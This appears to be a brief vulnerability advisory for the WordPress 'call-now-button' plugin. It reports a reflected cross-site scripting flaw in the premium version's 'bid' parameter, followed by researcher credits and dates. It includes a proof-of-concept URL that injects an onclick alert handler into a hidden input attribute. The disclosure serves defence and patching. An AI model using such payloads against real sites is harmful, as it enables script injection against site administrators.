The plugin does not escape a parameter before outputting it back in an attribute of a hidden input, leading to a Reflected Cross-Site Scripting when the premium is enabled
With premium enabled: http://example.com/wp-admin/admin.php?page=call-now-button&bid=xxxxx" accesskey=X onclick=alert(/XSS/) test="
7coo and JrXnm
7coo
Yes
2022-04-25 (about 2 months ago)
2022-04-25 (about 2 months ago)
2022-04-25 (about 2 months ago)